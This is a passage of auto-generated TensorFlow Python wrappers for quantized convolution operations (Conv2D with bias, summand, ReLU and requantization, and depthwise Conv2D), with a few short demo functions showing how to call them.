_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tbias, (bias,) = _execute.args_to_matching_eager([bias], ctx, [_dtypes.float32, _dtypes.qint32, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
min_freezed_output = _ops.convert_to_tensor(min_freezed_output, _dtypes.float32)
max_freezed_output = _ops.convert_to_tensor(max_freezed_output, _dtypes.float32)
_inputs_flat = [input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "Tbias",
_attr_Tbias, "out_type", out_type, "strides", strides, "padding", padding,
"dilations", dilations, "padding_list", padding_list)
_result = _execute.execute(b"QuantizedConv2DWithBiasAndRequantize", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2DWithBiasAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasAndRequantizeOutput._make(_result)
return _result
_QuantizedConv2DWithBiasSignedSumAndReluAndRequantizeOutput = collections.namedtuple(
"QuantizedConv2DWithBiasSignedSumAndReluAndRequantize",
["output", "min_output", "max_output"])
def quantized_conv2d_with_bias_signed_sum_and_relu_and_requantize(input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, summand, min_summand, max_summand, strides, padding, out_type=_dtypes.quint8, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""TODO: add doc.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
bias: A `Tensor`. Must be one of the following types: `float32`, `qint32`.
min_input: A `Tensor` of type `float32`.
max_input: A `Tensor` of type `float32`.
min_filter: A `Tensor` of type `float32`.
max_filter: A `Tensor` of type `float32`.
min_freezed_output: A `Tensor` of type `float32`.
max_freezed_output: A `Tensor` of type `float32`.
summand: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
min_summand: A `Tensor` of type `float32`.
max_summand: A `Tensor` of type `float32`.
strides: A list of `ints`.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.quint8`.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2DWithBiasSignedSumAndReluAndRequantize", name,
input, filter, bias, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, summand, min_summand,
max_summand, "out_type", out_type, "strides", strides, "padding",
padding, "dilations", dilations, "padding_list", padding_list)
_result = _QuantizedConv2DWithBiasSignedSumAndReluAndRequantizeOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_with_bias_signed_sum_and_relu_and_requantize_eager_fallback(
input, filter, bias, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, summand, min_summand,
max_summand, out_type=out_type, strides=strides, padding=padding,
dilations=dilations, padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_signed_sum_and_relu_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_signed_sum_and_relu_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_signed_sum_and_relu_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2DWithBiasSignedSumAndReluAndRequantize", input=input,
filter=filter,
bias=bias,
min_input=min_input,
max_input=max_input,
min_filter=min_filter,
max_filter=max_filter,
min_freezed_output=min_freezed_output,
max_freezed_output=max_freezed_output,
summand=summand,
min_summand=min_summand,
max_summand=max_summand,
strides=strides,
padding=padding,
out_type=out_type,
dilations=dilations,
padding_list=padding_list,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "Tbias",
_op._get_attr_type("Tbias"), "Tsummand",
_op._get_attr_type("Tsummand"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2DWithBiasSignedSumAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasSignedSumAndReluAndRequantizeOutput._make(_result)
return _result
QuantizedConv2DWithBiasSignedSumAndReluAndRequantize = tf_export("raw_ops.QuantizedConv2DWithBiasSignedSumAndReluAndRequantize")(_ops.to_raw_op(quantized_conv2d_with_bias_signed_sum_and_relu_and_requantize))
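# ---------------------------------------------------------------------------
# Illustrative sketch (editorial addition, not generated code): this signed
# variant fuses a residual add whose summand is itself quantized, here as
# signed qint8 over a symmetric range. Shapes, ranges, and the helper name
# are assumptions for the example.
def _demo_quantized_conv2d_with_bias_signed_sum_and_relu_and_requantize():
  import tensorflow as tf
  x = tf.random.uniform([1, 4, 4, 3], 0.0, 1.0)
  w = tf.random.uniform([2, 2, 3, 8], -1.0, 1.0)
  s = tf.random.uniform([1, 4, 4, 8], -3.0, 3.0)  # residual branch, float
  x_q, x_min, x_max = tf.quantization.quantize(x, 0.0, 1.0, tf.quint8)
  w_q, w_min, w_max = tf.quantization.quantize(w, -1.0, 1.0, tf.qint8)
  s_q, s_min, s_max = tf.quantization.quantize(s, -3.0, 3.0, tf.qint8)
  bias = tf.zeros([8], tf.float32)
  return tf.raw_ops.QuantizedConv2DWithBiasSignedSumAndReluAndRequantize(
      input=x_q, filter=w_q, bias=bias,
      min_input=x_min, max_input=x_max,
      min_filter=w_min, max_filter=w_max,
      min_freezed_output=0.0, max_freezed_output=6.0,
      summand=s_q, min_summand=s_min, max_summand=s_max,
      strides=[1, 1, 1, 1], padding="SAME")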
def quantized_conv2d_with_bias_signed_sum_and_relu_and_requantize_eager_fallback(input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, summand, min_summand, max_summand, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_signed_sum_and_relu_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_signed_sum_and_relu_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_signed_sum_and_relu_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tbias, (bias,) = _execute.args_to_matching_eager([bias], ctx, [_dtypes.float32, _dtypes.qint32, ])
_attr_Tsummand, (summand,) = _execute.args_to_matching_eager([summand], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
min_freezed_output = _ops.convert_to_tensor(min_freezed_output, _dtypes.float32)
max_freezed_output = _ops.convert_to_tensor(max_freezed_output, _dtypes.float32)
min_summand = _ops.convert_to_tensor(min_summand, _dtypes.float32)
max_summand = _ops.convert_to_tensor(max_summand, _dtypes.float32)
_inputs_flat = [input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, summand, min_summand, max_summand]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "Tbias",
_attr_Tbias, "Tsummand", _attr_Tsummand, "out_type", out_type, "strides",
strides, "padding", padding, "dilations", dilations, "padding_list",
padding_list)
_result = _execute.execute(b"QuantizedConv2DWithBiasSignedSumAndReluAndRequantize",
3, inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2DWithBiasSignedSumAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasSignedSumAndReluAndRequantizeOutput._make(_result)
return _result
_QuantizedConv2DWithBiasSumAndReluOutput = collections.namedtuple(
"QuantizedConv2DWithBiasSumAndRelu",
["output", "min_output", "max_output"])
def quantized_conv2d_with_bias_sum_and_relu(input, filter, bias, min_input, max_input, min_filter, max_filter, summand, strides, padding, out_type=_dtypes.qint32, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""TODO: add doc.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
bias: A `Tensor` of type `float32`.
min_input: A `Tensor` of type `float32`.
max_input: A `Tensor` of type `float32`.
min_filter: A `Tensor` of type `float32`.
max_filter: A `Tensor` of type `float32`.
summand: A `Tensor` of type `float32`.
strides: A list of `ints`.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint32`.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2DWithBiasSumAndRelu", name, input, filter, bias,
min_input, max_input, min_filter, max_filter, summand, "out_type",
out_type, "strides", strides, "padding", padding, "dilations",
dilations, "padding_list", padding_list)
_result = _QuantizedConv2DWithBiasSumAndReluOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_with_bias_sum_and_relu_eager_fallback(
input, filter, bias, min_input, max_input, min_filter, max_filter,
summand, out_type=out_type, strides=strides, padding=padding,
dilations=dilations, padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_sum_and_relu' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_sum_and_relu' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_sum_and_relu' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2DWithBiasSumAndRelu", input=input, filter=filter,
bias=bias, min_input=min_input,
max_input=max_input,
min_filter=min_filter,
max_filter=max_filter,
summand=summand, strides=strides,
padding=padding,
out_type=out_type,
dilations=dilations,
padding_list=padding_list,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2DWithBiasSumAndRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasSumAndReluOutput._make(_result)
return _result
QuantizedConv2DWithBiasSumAndRelu = tf_export("raw_ops.QuantizedConv2DWithBiasSumAndRelu")(_ops.to_raw_op(quantized_conv2d_with_bias_sum_and_relu))
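# ---------------------------------------------------------------------------
# Illustrative sketch (editorial addition, not generated code). In this
# variant the fused residual summand is a plain float32 tensor with the conv
# output shape; with "SAME" padding and unit strides that is [1, 4, 4, 8]
# here. Shapes and the helper name are assumptions for the example.
def _demo_quantized_conv2d_with_bias_sum_and_relu():
  import tensorflow as tf
  x = tf.random.uniform([1, 4, 4, 3], 0.0, 1.0)
  w = tf.random.uniform([2, 2, 3, 8], -1.0, 1.0)
  x_q, x_min, x_max = tf.quantization.quantize(x, 0.0, 1.0, tf.quint8)
  w_q, w_min, w_max = tf.quantization.quantize(w, -1.0, 1.0, tf.qint8)
  bias = tf.zeros([8], tf.float32)
  summand = tf.random.uniform([1, 4, 4, 8], 0.0, 1.0)  # float32 residual
  return tf.raw_ops.QuantizedConv2DWithBiasSumAndRelu(
      input=x_q, filter=w_q, bias=bias,
      min_input=x_min, max_input=x_max,
      min_filter=w_min, max_filter=w_max,
      summand=summand,
      strides=[1, 1, 1, 1], padding="SAME")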
def quantized_conv2d_with_bias_sum_and_relu_eager_fallback(input, filter, bias, min_input, max_input, min_filter, max_filter, summand, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_sum_and_relu' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_sum_and_relu' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_sum_and_relu' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
bias = _ops.convert_to_tensor(bias, _dtypes.float32)
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
summand = _ops.convert_to_tensor(summand, _dtypes.float32)
_inputs_flat = [input, filter, bias, min_input, max_input, min_filter, max_filter, summand]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations", dilations,
"padding_list", padding_list)
_result = _execute.execute(b"QuantizedConv2DWithBiasSumAndRelu", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2DWithBiasSumAndRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasSumAndReluOutput._make(_result)
return _result
_QuantizedConv2DWithBiasSumAndReluAndRequantizeOutput = collections.namedtuple(
"QuantizedConv2DWithBiasSumAndReluAndRequantize",
["output", "min_output", "max_output"])
def quantized_conv2d_with_bias_sum_and_relu_and_requantize(input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, summand, min_summand, max_summand, strides, padding, out_type=_dtypes.quint8, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""TODO: add doc.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
bias: A `Tensor`. Must be one of the following types: `float32`, `qint32`.
min_input: A `Tensor` of type `float32`.
max_input: A `Tensor` of type `float32`.
min_filter: A `Tensor` of type `float32`.
max_filter: A `Tensor` of type `float32`.
min_freezed_output: A `Tensor` of type `float32`.
max_freezed_output: A `Tensor` of type `float32`.
summand: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
min_summand: A `Tensor` of type `float32`.
max_summand: A `Tensor` of type `float32`.
strides: A list of `ints`.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.quint8`.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2DWithBiasSumAndReluAndRequantize", name, input,
filter, bias, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, summand, min_summand,
max_summand, "out_type", out_type, "strides", strides, "padding",
padding, "dilations", dilations, "padding_list", padding_list)
_result = _QuantizedConv2DWithBiasSumAndReluAndRequantizeOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_with_bias_sum_and_relu_and_requantize_eager_fallback(
input, filter, bias, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, summand, min_summand,
max_summand, out_type=out_type, strides=strides, padding=padding,
dilations=dilations, padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_sum_and_relu_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_sum_and_relu_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_sum_and_relu_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2DWithBiasSumAndReluAndRequantize", input=input,
filter=filter,
bias=bias,
min_input=min_input,
max_input=max_input,
min_filter=min_filter,
max_filter=max_filter,
min_freezed_output=min_freezed_output,
max_freezed_output=max_freezed_output,
summand=summand,
min_summand=min_summand,
max_summand=max_summand,
strides=strides,
padding=padding,
out_type=out_type,
dilations=dilations,
padding_list=padding_list,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "Tbias",
_op._get_attr_type("Tbias"), "Tsummand",
_op._get_attr_type("Tsummand"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2DWithBiasSumAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasSumAndReluAndRequantizeOutput._make(_result)
return _result
QuantizedConv2DWithBiasSumAndReluAndRequantize = tf_export("raw_ops.QuantizedConv2DWithBiasSumAndReluAndRequantize")(_ops.to_raw_op(quantized_conv2d_with_bias_sum_and_relu_and_requantize))
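# ---------------------------------------------------------------------------
# Illustrative sketch (editorial addition, not generated code). Compared to
# the signed-sum op, this variant is typically fed an unsigned quint8
# summand (e.g. the output of a preceding requantized Relu). Ranges and the
# helper name are assumptions for the example.
def _demo_quantized_conv2d_with_bias_sum_and_relu_and_requantize():
  import tensorflow as tf
  x = tf.random.uniform([1, 4, 4, 3], 0.0, 1.0)
  w = tf.random.uniform([2, 2, 3, 8], -1.0, 1.0)
  s = tf.random.uniform([1, 4, 4, 8], 0.0, 6.0)
  x_q, x_min, x_max = tf.quantization.quantize(x, 0.0, 1.0, tf.quint8)
  w_q, w_min, w_max = tf.quantization.quantize(w, -1.0, 1.0, tf.qint8)
  s_q, s_min, s_max = tf.quantization.quantize(s, 0.0, 6.0, tf.quint8)
  bias = tf.zeros([8], tf.float32)
  return tf.raw_ops.QuantizedConv2DWithBiasSumAndReluAndRequantize(
      input=x_q, filter=w_q, bias=bias,
      min_input=x_min, max_input=x_max,
      min_filter=w_min, max_filter=w_max,
      min_freezed_output=0.0, max_freezed_output=6.0,
      summand=s_q, min_summand=s_min, max_summand=s_max,
      strides=[1, 1, 1, 1], padding="SAME")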
def quantized_conv2d_with_bias_sum_and_relu_and_requantize_eager_fallback(input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, summand, min_summand, max_summand, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_sum_and_relu_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_sum_and_relu_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_sum_and_relu_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tbias, (bias,) = _execute.args_to_matching_eager([bias], ctx, [_dtypes.float32, _dtypes.qint32, ])
_attr_Tsummand, (summand,) = _execute.args_to_matching_eager([summand], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
min_freezed_output = _ops.convert_to_tensor(min_freezed_output, _dtypes.float32)
max_freezed_output = _ops.convert_to_tensor(max_freezed_output, _dtypes.float32)
min_summand = _ops.convert_to_tensor(min_summand, _dtypes.float32)
max_summand = _ops.convert_to_tensor(max_summand, _dtypes.float32)
_inputs_flat = [input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, summand, min_summand, max_summand]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "Tbias",
_attr_Tbias, "Tsummand", _attr_Tsummand, "out_type", out_type, "strides",
strides, "padding", padding, "dilations", dilations, "padding_list",
padding_list)
_result = _execute.execute(b"QuantizedConv2DWithBiasSumAndReluAndRequantize",
3, inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2DWithBiasSumAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasSumAndReluAndRequantizeOutput._make(_result)
return _result
_QuantizedDepthwiseConv2DOutput = collections.namedtuple(
"QuantizedDepthwiseConv2D",
["output", "min_output", "max_output"])
def quantized_depthwise_conv2d(input, filter, min_input, max_input, min_filter, max_filter, strides, padding, out_type=_dtypes.qint32, dilations=[1, 1, 1, 1], name=None):
r"""Computes quantized depthwise Conv2D.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The original input tensor.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The original filter tensor.
min_input: A `Tensor` of type `float32`.
The float value that the minimum quantized input value represents.
max_input: A `Tensor` of type `float32`.
The float value that the maximum quantized input value represents.
min_filter: A `Tensor` of type `float32`.
The float value that the minimum quantized filter value represents.
max_filter: A `Tensor` of type `float32`.
The float value that the maximum quantized filter value represents.
strides: A list of `ints`. List of stride values.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint32`.
The type of the output.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
List of dilation values.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedDepthwiseConv2D", name, input, filter, min_input,
max_input, min_filter, max_filter, "out_type", out_type, "strides",
strides, "padding", padding, "dilations", dilations)
_result = _QuantizedDepthwiseConv2DOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_depthwise_conv2d_eager_fallback(
input, filter, min_input, max_input, min_filter, max_filter,
out_type=out_type, strides=strides, padding=padding,
dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_depthwise_conv2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
